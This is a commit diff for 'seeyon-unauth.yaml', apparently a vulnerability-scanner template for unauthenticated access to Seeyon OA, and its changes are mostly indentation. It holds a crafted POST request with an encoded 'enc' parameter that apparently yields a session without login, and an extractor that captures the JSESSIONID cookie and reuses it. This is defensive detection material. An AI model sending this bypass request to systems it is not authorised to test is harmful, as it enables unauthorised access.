Update seeyon-unauth.yaml

patch-1
PikPikcU 2021-04-13 06:17:52 +00:00 committed by GitHub
parent 397eca6945
commit 1c59b2e7f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 7 deletions

View File

@ -15,7 +15,7 @@ requests:
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
- |
@ -27,12 +27,12 @@ requests:
Cookie: {{session}}
extractors:
- type: regex
name: session
part: header
internal: true
regex:
- 'JSESSIONID=(.*)'
- type: regex
name: session
part: header
internal: true
regex:
- 'JSESSIONID=(.*)'
matchers: